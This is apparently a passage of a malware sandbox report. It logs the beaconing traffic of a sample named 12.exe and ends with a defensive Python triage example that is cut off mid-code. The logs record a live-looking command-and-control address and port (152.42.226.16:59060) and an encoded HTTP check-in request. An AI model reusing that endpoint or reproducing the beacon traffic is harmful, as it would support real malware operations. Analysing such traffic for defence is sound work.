                          Dec 26, 2024 19:30:33.522068977 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.530293941 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.641638041 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.641710043 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.642071962 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.761821032 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.316817999 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.319540024 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.319622040 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.430314064 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.461288929 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.581005096 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.583951950 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.584374905 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.704761982 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.298399925 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.298481941 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.298763990 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.413134098 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.418293953 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.532872915 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.532941103 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.533180952 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.652695894 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.223833084 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.223933935 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.223985910 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.337469101 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.343713045 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.457485914 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.461509943 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.461770058 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.581305027 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.113858938 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.113944054 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.122766018 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.241350889 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.243107080 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.363455057 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.363562107 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.363850117 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.483381987 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.020108938 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.020190954 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.020288944 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.131387949 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.186465979 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.251367092 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.253293991 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.253293991 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.372956038 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:50.909996986 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:50.913583994 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:50.917469978 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.022778988 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.036978006 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:51.142822981 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:51.145656109 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.145812988 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.268532038 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:53.801824093 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:53.801887035 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:53.801969051 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:53.912539005 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:53.921555042 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:54.033088923 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:54.033155918 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:54.033323050 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:54.152776003 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.735111952 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.737649918 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.738687992 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.849514961 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.858298063 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.971518993 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.973634958 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.974014044 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:57.095529079 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.629878998 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.629939079 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.630018950 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.741372108 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.749857903 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.861047029 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.861116886 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.861352921 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.980786085 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.519850969 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.519994974 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.519994974 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.630422115 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.659183025 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.750138044 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.750293970 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.750802040 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.871299982 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.411786079 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.411870956 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.412240982 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.521898031 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.532038927 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.641504049 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.641573906 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.641815901 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.761378050 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.301745892 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.305535078 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.305648088 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.413490057 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.425344944 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.538296938 CET5906050067152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.541639090 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.545495987 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.670759916 CET5906050067152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:11.207623959 CET5906050067152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:11.209608078 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.209608078 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.319192886 CET5006859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.330179930 CET5906050067152.42.226.16192.168.2.4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Dec 26, 2024 19:31:11.439435005 CET | 59060 | 50068 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:11.439524889 CET | 50068 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:11.439768076 CET | 50068 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:11.559969902 CET | 59060 | 50068 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:14.098051071 CET | 59060 | 50068 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:14.098124027 CET | 50068 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:14.099030018 CET | 50068 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:14.210242987 CET | 50069 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:14.218589067 CET | 59060 | 50068 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:14.331023932 CET | 59060 | 50069 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:14.335798025 CET | 50069 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:14.336307049 CET | 50069 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:14.455863953 CET | 59060 | 50069 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:16.988807917 CET | 59060 | 50069 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:16.988917112 CET | 50069 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:16.989059925 CET | 50069 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:17.101635933 CET | 50070 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:17.109639883 CET | 59060 | 50069 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:17.221447945 CET | 59060 | 50070 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:17.221600056 CET | 50070 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:17.221771002 CET | 50070 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:17.341250896 CET | 59060 | 50070 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:19.896161079 CET | 59060 | 50070 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:19.896222115 CET | 50070 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:19.896342039 CET | 50070 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:20.006856918 CET | 50071 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:20.015815973 CET | 59060 | 50070 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:20.126341105 CET | 59060 | 50071 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:20.126410007 CET | 50071 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:20.126601934 CET | 50071 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:20.246169090 CET | 59060 | 50071 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:22.845076084 CET | 59060 | 50071 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:22.845150948 CET | 50071 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:22.845253944 CET | 50071 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:22.958726883 CET | 50072 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:22.964870930 CET | 59060 | 50071 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:23.078520060 CET | 59060 | 50072 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:23.079722881 CET | 50072 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:23.079849958 CET | 50072 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:23.200109959 CET | 59060 | 50072 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:25.755268097 CET | 59060 | 50072 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:25.755345106 CET | 50072 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:25.772150040 CET | 50072 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:25.882299900 CET | 50073 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:25.891699076 CET | 59060 | 50072 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:26.001961946 CET | 59060 | 50073 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:26.002033949 CET | 50073 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:26.002208948 CET | 50073 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:26.122737885 CET | 59060 | 50073 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:28.660767078 CET | 59060 | 50073 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:28.660856962 CET | 50073 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:28.660974979 CET | 50073 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:28.772547960 CET | 50074 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:28.780559063 CET | 59060 | 50073 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:28.893815041 CET | 59060 | 50074 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:28.897706032 CET | 50074 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:28.897826910 CET | 50074 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:29.017288923 CET | 59060 | 50074 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:31.559768915 CET | 59060 | 50074 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:31.559824944 CET | 50074 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:31.559921980 CET | 50074 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:31.678514004 CET | 50075 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:31.681379080 CET | 59060 | 50074 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:31.800256968 CET | 59060 | 50075 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:31.800335884 CET | 50075 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:31.800551891 CET | 50075 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:31.921432018 CET | 59060 | 50075 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:34.517851114 CET | 59060 | 50075 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:34.521650076 CET | 50075 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:34.521650076 CET | 50075 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:34.633538961 CET | 50076 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:34.641894102 CET | 59060 | 50075 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:34.753243923 CET | 59060 | 50076 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:34.753393888 CET | 50076 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:34.753815889 CET | 50076 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:35.015242100 CET | 59060 | 50076 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:37.583408117 CET | 59060 | 50076 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:37.583462000 CET | 50076 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:37.583528042 CET | 50076 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:37.693984032 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:37.703119040 CET | 59060 | 50076 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:37.813515902 CET | 59060 | 50077 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:37.813596010 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:37.813818932 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:37.935028076 CET | 59060 | 50077 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:40.474548101 CET | 59060 | 50077 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:40.475090027 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:40.475234985 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:40.585547924 CET | 50078 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:40.785557032 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:41.055795908 CET | 59060 | 50077 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:41.056081057 CET | 59060 | 50077 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:41.056137085 CET | 59060 | 50078 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:41.056149960 CET | 59060 | 50077 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:41.056243896 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:41.056267023 CET | 50078 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:41.056358099 CET | 50077 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:41.056504965 CET | 50078 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:41.176073074 CET | 59060 | 50078 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:43.731837988 CET | 59060 | 50078 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:43.731887102 CET | 50078 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:43.731971025 CET | 50078 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:43.850303888 CET | 50079 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:43.851541996 CET | 59060 | 50078 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:43.969991922 CET | 59060 | 50079 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:43.970068932 CET | 50079 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:43.970377922 CET | 50079 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:44.089889050 CET | 59060 | 50079 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:46.631531954 CET | 59060 | 50079 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:46.633605003 CET | 50079 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:46.633671045 CET | 50079 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:46.740775108 CET | 50080 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:46.753174067 CET | 59060 | 50079 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:46.860582113 CET | 59060 | 50080 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:46.860682011 CET | 50080 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:46.860937119 CET | 50080 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:46.980849981 CET | 59060 | 50080 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:49.520464897 CET | 59060 | 50080 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:49.520544052 CET | 50080 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:49.520590067 CET | 50080 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:49.631028891 CET | 50081 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:49.640225887 CET | 59060 | 50080 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:49.750746965 CET | 59060 | 50081 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:49.750819921 CET | 50081 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:49.751136065 CET | 50081 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:49.870963097 CET | 59060 | 50081 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:52.411937952 CET | 59060 | 50081 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:52.413722038 CET | 50081 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:52.413722038 CET | 50081 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:52.521015882 CET | 50082 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:52.533343077 CET | 59060 | 50081 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:52.640676975 CET | 59060 | 50082 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:52.640818119 CET | 50082 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:52.641571045 CET | 50082 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:52.762439966 CET | 59060 | 50082 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:55.302402973 CET | 59060 | 50082 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:55.302479029 CET | 50082 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:55.302933931 CET | 50082 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:55.413165092 CET | 50083 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:55.422420979 CET | 59060 | 50082 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:55.534677982 CET | 59060 | 50083 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:55.534775972 CET | 50083 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:55.534957886 CET | 50083 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:55.654504061 CET | 59060 | 50083 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:58.236124039 CET | 59060 | 50083 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:58.236196041 CET | 50083 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:58.236236095 CET | 50083 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:58.349260092 CET | 50084 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:58.356400013 CET | 59060 | 50083 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:58.469794989 CET | 59060 | 50084 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:31:58.469934940 CET | 50084 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:58.470114946 CET | 50084 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:31:58.589824915 CET | 59060 | 50084 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:32:01.239901066 CET | 59060 | 50084 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:32:01.240048885 CET | 50084 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:32:01.240165949 CET | 50084 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:32:01.349574089 CET | 50085 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:32:01.359796047 CET | 59060 | 50084 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:32:01.470118999 CET | 59060 | 50085 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:32:01.470205069 CET | 50085 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:32:01.470427990 CET | 50085 | 59060 | 192.168.2.4 | 152.42.226.16
                          Dec 26, 2024 19:32:01.591388941 CET | 59060 | 50085 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:32:04.130444050 CET | 59060 | 50085 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:32:04.130503893 CET | 50085 | 59060 | 192.168.2.4 | 152.42.226.16
                          • 152.42.226.16:59060
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49730 | 152.42.226.16 | 59060 | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:27:58.501960039 CET | 380 | OUT | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache
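
The request above is repeated unchanged in every session that follows, roughly every three seconds and from a fresh ephemeral source port each time. The Python below is an added example (not part of the Joe Sandbox report and not code from the sample) that applies the checks an analyst would run on such a capture: it parses the raw request, reads the port from the Host header, decodes the Cookie value and measures its length, and computes the check-in interval and its coefficient of variation from the session timestamps. The request text and the eight timestamps are copied from sessions 0 to 7 of this report; the thresholds (which ports count as ordinary HTTP, the 10% jitter cut-off) are assumptions chosen for illustration.

```python
"""Heuristic triage of a repeated HTTP check-in request (added example)."""
import base64
import re
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample input: the check-in request as captured in the report
# (every session carries the identical request) and the timestamps of sessions 0 to 7.
COOKIE = ("FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/"
          "rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=")
REQUEST = (
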